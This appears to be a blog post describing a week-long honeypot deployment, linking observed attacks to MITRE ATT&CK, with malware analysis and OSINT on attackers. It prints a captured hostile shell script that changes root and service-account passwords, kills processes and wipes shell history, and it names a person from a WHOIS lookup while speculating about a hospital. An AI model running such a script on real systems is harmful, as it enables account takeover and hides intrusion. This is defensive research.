I Planted A Honeypot in the Middle East

On February 7, 2022, I planted a honeypot in Bahrain, one of the wealthiest countries in the Middle East.

Adversaries quickly noticed its presence and began executing a variety of attacks against it.

Over the span of a week, greater than 300,000 occurrences of unauthorized activity originated from around the globe, with hot spots being Vietnam, Russia, India, and the United States.

What are Honeypots?

Honeypots are network-attached systems designed to mimic targets of cyberattacks.

Security researchers use them to identify attacks, deflect them from a legitimate target, and learn how hackers operate.

You might’ve never heard of them before, but honeypots have been around for decades.

The principle behind them is simple: Don’t go looking for attackers.

Instead, release something that would attract malicious entities — the honeypot — and then wait for them to show up.

Purpose

Understanding the techniques, tactics, and procedures (TTPs) utilized by hackers is crucial to establishing innovative and effective security measures.

In the field of cybersecurity, there are two primary “teams“ that are commonly referenced:

Red Team and Blue Team.

The former emulates the adversarial pursuits of attackers, whereas the latter identifies threat actors and defends infrastructures.

Both teams work in tandem to enhance the security status of an organization.

Now that you see the importance of grasping the offensive TTPs used by attackers, let me introduce you to the framework I’ll be using for that very purpose:

The MITRE ATT&CK framework.

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a curated knowledge base and model for malicious cyber behavior, reflecting the various phases of an adversary’s attack lifecycle and the platforms they commonly target.

The framework is a valuable resource for everyone involved in InfoSec because of its depth regarding a hacker’s approach and mindset.

Implementation

Inside of Amazon Web Services (AWS), I used a Debian 10 Buster EC2 instance to host T-Pot.

T-Pot is a virtual machine (VM) created by T-Mobile that is composed of multiple honeypots.

Every component inside the VM is dockered, which means they’re in separate containers.

This enables T-Pot to run multiple tools and honeypot daemons on a shared network interface while maintaining a small footprint and constraining each honeypot within its own environment.

Here’s an overview of one of its built-in honeypot daemons:

Cowrie

Cowrie is a medium-to-high interaction SSH and Telnet honeypot designed to log brute-force attacks and shell commands executed by attackers.

In medium interaction mode, it mirrors a UNIX system, whereas in high interaction mode, it functions as an SSH and Telnet proxy that observes malicious behavior.

Installation

After launching the AWS instance, setting up T-Pot was simple:

• Cloned the T-Pot GitHub repository and completed the installation process
• Allowed administration from my IP address on two specific ports (64295 and 64297)
• Permitted traffic from the outside world on ports 1–64000

Using the ELK Stack it provides (Elasticsearch, Logstash, and Kibana), I aggregated logs from my honeypot daemons and created visualizations for monitoring, troubleshooting, data analytics, etc.

MITRE ATT&CK Data Correlation

This article aims to tie my findings to the MITRE ATT&CK framework while also analyzing malware and conducting OSINT on the offenders.

Data analysis revealed that the main goals behind the attacks were to add my honeypot to a botnet and install cryptocurrency miners on it.

Botnets

A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.

It is a sub-technique of T1583, Acquire Infrastructure, a resource development tactic within the MITRE ATT&CK framework.

“With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale phishing or Distributed Denial of Service (DDoS).”

The following commands display an information-gathering attack that was frequently performed against my Cowrie daemon:

Starting from the bottom, ifconfig was run to identify network interfaces on the machine.

Secondly, uname -a was executed to print all system information.

This was likely done to determine whether or not my honeypot’s kernel version, OS architecture, and operating system coincided with the requirements for the adversary’s botnet.

Lastly, cat /proc/cpuinfo was used to print a read-only text file containing information about my honeypot’s CPU.

Here’s an example of what that command would output:

. . .
vendor_id       : GenuineIntel
cpu family      : 6
model           : 158
model name      : Intel(R) Core(TM) i7-8700K CPU @ 3.70GHz
stepping        : 10
cpu MHz         : 3696.002
cache size      : 12288 KB
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 4
. . .

These are all instances of adversarial reconnaissance, a technique centered around using information from a victim’s host to improve the efficacy of malicious endeavors.

Cryptocurrency Miners

A cryptominer is a stealthy type of malware that takes advantage of a system’s resources to generate revenue for the hackers controlling it, usually by mining Bitcoin, Ethereum, or Monero.

Instead of using expensive GPU farms, cryptominers utilize the processing power of compromised computers and servers.

This process, commonly referred to as cryptojacking, leads to adverse side effects such as:

• System disruption
• Increased processor usage
• Overheating machines
• Excessively high power bills

The following screenshot displays the commands that an attacker used to install a cryptominer called “c3pool_miner.”

First, they retrieved a setup script via curl and piped it to Bash for execution.

Then, they filtered through all running processes with ps | grep "[Mm]iner" to see if their cryptominer was successfully installed.

This attack, known as resource hijacking, corresponds to technique T1496 within MITRE ATT&CK and can be performed on virtually all platforms, including containerized environments.

Command History Exhibit

Malware Analysis

wget and curl were frequently used by attackers to download and execute malicious files from external web servers.

Knowing that, let’s inspect some of the malware that hackers installed on my honeypot.

We can insert the SHA256 hashes (unique fingerprints) of interesting binary files into VirusTotal, an online resource used to analyze suspicious files and automatically share them with the InfoSec community.

Mirai Botnet Malware

One of the malicious ELF 32-bit executables downloaded to my Cowrie honeypot-daemon belongs to the Mirai Botnet.

Mirai infects smart devices that run on ARC processors, effectively turning them into a network of remotely controlled bots or “zombies.”

Mirai starts as a self-propagating worm, replicating itself once it infects and locates another vulnerable IoT device.

Propagation is accomplished by using infected IoT devices to scan the internet and discover additional vulnerable targets (T0883.)

If a suitable device is found, the already-infected device reports its findings back to a command and control (C2) server.

Once the C2 server receives a list of vulnerable devices, it loads a payload and infects the targets.

After compromising an array of machines, C2 servers can utilize many DDoS techniques such as HTTP, TCP, and UDP flooding (T1498.001.)

Mirai focuses on infecting as many devices as possible, which isn’t difficult due to the lack of security within Internet of Things (IoT) devices.

Initially, Mirai compromised IoT devices with brute-force attacks that filled in 64 sets of default usernames and passwords like “admin” and “password.”

However, its latest modules use up-to-date vulnerabilities to maximize efficiency.

This can be seen in newer variants of the botnet, such as “IoT.Linux.MIRAI.VWISI” found in July 2020, which uses CVE-2020-10173 to exploit Comtrend VR-3033 routers.

Even more recently, AT&T’s Alien Labs identified a variant dubbed “Moobot” sharply increasing its scans for Tenda routers that are exploitable with a critical remote code execution (RCE) vulnerability.

quickr1n.sh — Recon for Cryptominers

Here’s the content of quickr1n.sh, a malicious shell script that was executed on Cowrie:

echo root:r14sdgs24h3h12sd344|chpasswd|bash;
echo gns3:1r43gs1asdan4asd4asd113s24h3h12344| sudo chpasswd -e
echo jenkins:r4113asdgs2asd4g1s324h3h12344| sudo chpasswd -e
echo ansible:r4131asdg1saasd14sn43gd24h3h12344| sudo chpasswd -e
#temp_root_pass
pkill java; pkill ntpd; pkill screen; pkill cnrig;
pkill xmrig; pkill brrr; pkill x86_64; pkill x86;
pkill docker; pkill tsm; pkill krn;
pkill ip; pkill .dhpcd; pkill xms;
echo fk
rm -rf /root/.history
rm -rf /root/*_history
rm -rf /root/.login
rm -rf /root/.logout
rm -rf /root/.bash_logut
rm -rf /root/.Xauthority
echo 1
nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | grep . -c
lspci | grep "3D controller" | cut -f5- -d ' '
lspci | grep VGA -c
lspci | grep VGA | cut -f5- -d ' '
uptime -p
ip r | grep -Eo '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/[0-9]{1,2}'
history -n; history -c
cat /dev/null > ~/.bash_history && history -c
echo done

Notice the line containing nvidia-smi -q?

Attackers used it to retrieve my honeypot’s GPU specifications and gather cryptojacking info.

SHA256 hash of the script: a9ee220389355426509c31859695bf2f062b5460743b32be5db8235115c489f5

Entering the file’s unique fingerprint into VirusTotal provides the following page, showing that only 5 out of 59 security vendors flagged the file as malicious:

OSINT

Now that we’ve gone over some of the malware installed on the honeypot, what’s next?

Well, you may be wondering who initiated these attacks.

We can utilize public resources and key aspects of the data we’ve gathered thus far to learn about potential culprits.

That’s the idea behind open-source intelligence, or OSINT for short.

The following demonstrates the detective-like approach I used to gain info on one of the attacks.

The Swiss Origin of quickr1n.sh

My logs reveal that the cryptominer script mentioned earlier, quickr1n.sh, was installed by an entity in Zürich, Switzerland.

The attacker’s ISP, Private Layer, holds its operations in Panama City, Panama.

Their website shows that they provide unmanaged, dedicated servers hosted in Switzerland, a country known for its strict privacy laws.

Let’s travel to the coordinates we have, 47.355, 8.555, inside of Google Maps.

Interesting… it looks like the attack originated very close to a university building!

Perhaps one or more of their machines are compromised?

According to Google Maps, the building is a subset of the University Hospital of Zürich.

“Kalaidos Fachhochschule Gesundheit” translates to Careum University of Health.

This isn’t surprising, as university hospitals (hospitals that conduct medical research and provide education to medical students) are frequent targets of cyberattacks.

Let’s conduct further reconnaissance on the IP address tied to the attack.

Looks like it’s blacklisted by 13 out of 115 IP integrity engines.

Opening one of them, DroneBL, reveals that it was flagged for automated SSH dictionary attacks on February 12, 2022, the same day of the attack!

We can advance our search by making a WHOIS query to obtain information on the IP address.

WHOIS is a public database that stores contact and registration information for domain names.

We received a name, Milciades Garcia, phone number, AND an address in Panama!

Googling the building shows that it’s a high-rise building mainly used for commercial offices.

Once again, it’s located right next to a hospital, which is interesting.

There are more OSINT areas we could look into if we wanted to go really in-depth, but I’ll stop here.

Thank you for reading about my experience planting a honeypot in the Middle East.